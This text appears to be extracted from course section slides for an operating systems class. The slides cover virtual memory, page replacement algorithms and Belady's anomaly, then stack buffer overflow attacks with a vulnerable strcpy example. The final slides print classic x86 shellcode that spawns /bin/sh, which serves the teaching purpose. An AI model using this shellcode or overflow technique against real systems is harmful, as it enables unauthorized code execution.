CSE Four Fiddy One – Section 7 Project 2 hints VM (process memory, buffer overrun attacks)

Webserver w/user threads Use pthreads for Web server-related parts (parts 4 and 6) We won’t test sioux with user threads

Project 2 – questions?

Virtual Memory (quick recap) Physical memory Process’ VM: Another process Disk (Inspired from wikipedia)

Virtual Memory (quick recap) Process’ Page table Physical memory Process’ VM: Another process page frame # Disk

Virtual Memory (quick recap) Process’ Page table Physical memory Process’ VM: Another process page frame # Disk How can we use paging to set up sharing of memory between two processes?

Process Memory Organization 0x00000000 Code TEXT Initialized/uninitialized global/static variables static int a = 3; DATA Heap char* buff = (char*)malloc(…) 1. 2. Just declare variables on the stack in order and look at their addresses. 3. 0x00000000 to 0xBFFFFFFF is the USER SEGMENT, 0xC0000000 to 0xFFFFFFFF is the KERNEL SEGMENT. This is the only segmentation Linux uses. STACK What goes here? Program stack 0xBFFFFFFF In figure, stack grows downwards, but it’s not necessary How can you determine the direction in which stack grows? What is in the address range 0xC0000000 to 0xFFFFFFFF?

Page Replacement Algorithms What you are NOT doing this quarter: Project 3 - Your job: Replacement Algorithms Given: random You need to write: FIFO LRU Clock One of your choice A few possibilities: True LRU (e.g. via storing full timestamp) Variations on LRU Clock (enhanced second-chance, etc) LFU/MFU Your own! You can write more than 3 if your experiment focuses on replacement algorithms. So we are going to go over some of these instead.

Page Replacement Algorithms FIFO (First in/first out) Replace the oldest page with the one being paged in Not very good in practice, suffers from Belady’s Anomaly Second-Chance (Modified FIFO) FIFO, but skip referenced pages VAX/VMS used this Random Duh Better than FIFO! NFU (Not Frequently Used) Replace the page used the least number of times Better variation: Aging ensures that pages that have not been used for a while go away. NRU (Not Recently Used) Replace a page not used since last clock cycle LRU (Least Recently Used) Replace the least recently used page Works well but expensive to implement. (More efficient variants include LRU-K) LRU Clock (Modified LRU) Replace the least recently used page, with a hard limit on the max time since used Clairvoyant Replace the page that’s going to be needed farthest in the future. Linux 2.4 kernel uses NFU w/Aging http://www.surriel.com/system/files/linux24-vm-freenix01.pdf

Example of Belady’s Anomaly Page Requests 321032432104

Example (Page Faults in Red) 3 frames Frame 1 Frame 2 Frame 3 3 2 1 4 9 Page Faults

Example (Page Faults in Red) 4 frames Frame 1 Frame 2 Frame 3 Frame 4 3 2 1 4 10 Page Faults

Stack Overflow Attacks

Example What does the process’ memory look like for the following code: void foo(int a, int b, int c) { char buffer1[5]; char buffer2[10]; } void main() { foo(1,2,3); We’re here w/ execution Program stack Global variables Heap Code Draw on board Example taken from “Smashing The Stack For Fun And Profit ”

How would you smash the stack? buffer2 3 words buffer1 2 words SFP 1 word RET 1 word a 1 word b 1 word 1 word c Bottom of stack (0xBFFFFFFF) Word size (4B)

Buffer overflows What’s the bug? void foo(char* str) { char buffer[5]; strcpy(buffer, str); } void main() { char large_string[256]; … foo(large_string); Example taken from “Smashing The Stack For Fun And Profit ”

The stack contents buffer SFP RET *str void foo(char* str) { Small addr void foo(char* str) { char buffer[5]; strcpy(buffer, str); } void main(int argc, char* argv[]) { … foo(argv[1]); buffer SFP RET *str Large addr

The stack contents What cmd-line argument should attacker provide? Small addr void foo(char* str) { char buffer[5]; strcpy(buffer, str); } void main(int argc, char* argv[]) { foo(argv[1]); What cmd-line argument should attacker provide? - Length? - Contents? buffer SFP RET 8 + 4 + 4 (here address of next byte) + size of malicious code (e.g., shell code -- ) *str Large addr

Shell code Program to bring up a shell: If you de-assemble, you get: #include <stdio.h> void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } If you de-assemble, you get: "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd” "\x80\xe8\xdc\xff\xff\xff/bin/sh";

More information Smashing The Stack For Fun And Profit, Aleph One: http://www.cs.washington.edu/education/courses/cse599g/CurrentQtr/stack.txt